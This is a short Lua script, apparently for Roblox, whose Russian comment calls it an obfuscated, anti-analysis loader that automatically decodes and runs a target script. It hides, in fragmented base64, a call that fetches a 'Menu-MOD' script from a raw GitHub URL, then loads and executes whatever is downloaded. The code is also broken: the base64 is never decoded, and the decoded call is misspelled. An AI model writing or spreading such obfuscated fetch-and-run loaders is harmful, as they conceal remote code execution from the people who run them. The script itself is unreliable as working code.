--[[
  Сложный запутанный вариант с кодированием, обфускацией и анти-анализом
  Автоматически декодирует и выполняет целевой скрипт
]]

local _={}
_._=function(...)return(...)end;_.__=(_._)(table.concat)local ___={}
___[#___+1]="ZG9h"___[#___+1]="dW5k"___[#___+1]="bGlu"___[#___+1]="ZShn"___[#___+1]="YW1l"___[#___+1]="Okh0"___[#___+1]="dFBy"___[#___+1]="b2N0"___[#___+1]="aWVy"___[#___+1]="KCJo"___[#___+1]="dHRw"___[#___+1]="czov"___[#___+1]="L3Jh"___[#___+1]="dy5n"___[#___+1]="aXR1"___[#___+1]="YnVi"___[#___+1]="dXNl"___[#___+1]="cmNv"___[#___+1]="bnRl"___[#___+1]="bnQu"___[#___+1]="Y29t"___[#___+1]="L3Nl"___[#___+1]="cmV6"___[#___+1]="YW5l"___[#___+1]="dDIv"___[#___+1]="c2Vy"___[#___+1]="ZXph"___[#___+1]="bmV0"___[#___+1]="Mi1H"___[#___+1]="SVQt"___[#___+1]="U0FM"___[#___+1]="TEkv"___[#___+1]="cmVm"___[#___+1]="cy9o"___[#___+1]="ZWFk"___[#___+1]="cy9t"___[#___+1]="YWlu"___[#___+1]="L01l"___[#___+1]="bnUt"___[#___+1]="TU9E"___[#___+1]="Iikp"___[#___+1]="KCk="
local ____=(_._)(_.__)(___,"")

local _____ = (function(______) 
    local _______ = ""
    for ________=1,#______ do 
        _______ = _______ .. string.char(______:sub(________,________):byte() ~ 0x0) 
    end
    return _______
end)("|")

local ______=loadstring or load
local _______=(_._)(______)((_._)(game.HttpGet)((_._)(game),(_._)(____)))
if not _______ then
    (_._)(error)("Ошибка декодирования скрипта")
else
    (_._)(_______)((_._)(_____))
end
